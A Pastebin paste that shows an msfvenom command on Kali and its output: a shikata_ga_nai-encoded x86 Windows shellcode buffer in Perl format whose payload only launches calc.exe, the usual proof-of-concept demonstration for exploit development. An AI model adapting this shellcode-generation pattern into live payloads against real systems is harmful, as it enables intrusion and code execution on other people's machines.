Advertisement
Guest User

MSFVENOM payload for perl windows 7

a guest
Feb 21st, 2018
56
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. root@kali:~# msfvenom -p windows/exec cmd=calc.exe,exitfunc=none -a x86 -b '\x00' -f perl
  2. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  3. Found 10 compatible encoders
  4. Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
  5. x86/shikata_ga_nai succeeded with size 234 (iteration=0)
  6. x86/shikata_ga_nai chosen with final size 234
  7. Payload size: 234 bytes
  8. Final size of perl file: 1031 bytes
  9. my $buf =
  10. "\xda\xcd\xd9\x74\x24\xf4\x5d\x31\xc9\xb8\x09\x1f\x05\x43" .
  11. "\xb1\x34\x31\x45\x1a\x03\x45\x1a\x83\xed\xfc\xe2\xfc\xe3" .
  12. "\xed\xc1\xfe\x1b\xee\xa5\x77\xfe\xdf\xe5\xe3\x8a\x70\xd6" .
  13. "\x60\xde\x7c\x9d\x24\xcb\xf7\xd3\xe0\xfc\xb0\x5e\xd6\x33" .
  14. "\x40\xf2\x2a\x55\xc2\x09\x7e\xb5\xfb\xc1\x73\xb4\x3c\x3f" .
  15. "\x79\xe4\x95\x4b\x2f\x19\x91\x06\xf3\x92\xe9\x87\x73\x46" .
  16. "\xb9\xa6\x52\xd9\xb1\xf0\x74\xdb\x16\x89\x3d\xc3\x7b\xb4" .
  17. "\xf4\x78\x4f\x42\x07\xa9\x81\xab\xab\x94\x2d\x5e\xb2\xd1" .
  18. "\x8a\x81\xc1\x2b\xe9\x3c\xd1\xef\x93\x9a\x54\xf4\x34\x68" .
  19. "\xce\xd0\xc5\xbd\x88\x93\xca\x0a\xdf\xfc\xce\x8d\x0c\x77" .
  20. "\xea\x06\xb3\x58\x7a\x5c\x97\x7c\x26\x06\xb6\x25\x82\xe9" .
  21. "\xc7\x36\x6d\x55\x6d\x3c\x80\x82\x1c\x1f\xcf\x55\x93\x25" .
  22. "\xbd\x56\xab\x25\x92\x3e\x9a\xae\x7d\x38\x23\x65\x3a\xb6" .
  23. "\x6e\x24\x6b\x5f\x36\xbc\x29\x02\xc9\x6a\x6d\x3b\x49\x9f" .
  24. "\x0e\xb8\x51\xea\x0b\x84\xd6\x06\x66\x95\xb2\x28\xd5\x96" .
  25. "\x97\x4a\xb8\x04\x74\xa3\x5f\xad\x1f\x97\xfa\x35\xb6\x93" .
  26. "\x62\xb3\x26\x3f\x56\x55\xd9\xd1\xcd\xa9";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement